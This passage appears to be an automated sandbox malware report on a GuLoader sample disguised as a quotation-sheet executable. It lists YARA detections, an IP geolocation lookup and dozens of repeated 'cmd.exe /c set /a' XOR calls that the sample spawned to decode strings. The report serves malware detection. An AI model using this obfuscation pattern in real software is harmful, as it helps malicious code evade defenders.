                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 5
                                                                              Last-Modified: Wed, 24 Jul 2024 12:45:29 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4fhFOfnjN6HWexzK8kFdvIQuqGsSqOM5XiT4gticmw2N6Jy4%2B70odMt5Alp3iKSA1CNChmGuaeJ4A%2FEoERjcSxl5cK%2BUBv1qdlzSnKLZdzLxGqShCG%2BYT6%2FrJ3UnmzzaxMUGm7YP"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a840212085f829e-IAD
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-24 12:45:34 UTC342INData Raw: 31 34 66 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e
                                                                              Data Ascii: 14f<Response><IP>149.18.24.104</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.
                                                                              2024-07-24 12:45:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:08:44:39
                                                                              Start date:24/07/2024
                                                                              Path:C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"
                                                                              Imagebase:0x400000
                                                                              File size:1'009'096 bytes
                                                                              MD5 hash:CFB41760F84E1E70BADE0CA7394D424B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.38290946612.000000000057E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.38293091270.0000000005981000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:08:44:40
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "250^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:3
                                                                              Start time:08:44:40
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:4
                                                                              Start time:08:44:40
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "244^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:5
                                                                              Start time:08:44:40
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:6
                                                                              Start time:08:44:40
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "227^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:7
                                                                              Start time:08:44:40
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:8
                                                                              Start time:08:44:40
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "255^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:9
                                                                              Start time:08:44:40
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:10
                                                                              Start time:08:44:40
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "244^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:11
                                                                              Start time:08:44:40
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:12
                                                                              Start time:08:44:40
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "253^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:13
                                                                              Start time:08:44:40
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:14
                                                                              Start time:08:44:40
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "130^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:15
                                                                              Start time:08:44:40
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:16
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "131^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:17
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:18
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "139^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:19
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:20
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "139^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:21
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:22
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "242^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:23
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:24
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "195^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:25
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:26
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "212^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:27
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:28
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "208^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:29
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:30
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "197^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:31
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:32
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "212^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:33
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:34
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "247^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:35
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:36
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "216^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:37
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:38
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "221^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:39
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:40
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "212^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:41
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:42
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "240^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:43
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:44
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "153^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:45
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:46
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "220^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:47
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:48
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:49
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:50
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "195^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:51
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:52
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "133^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
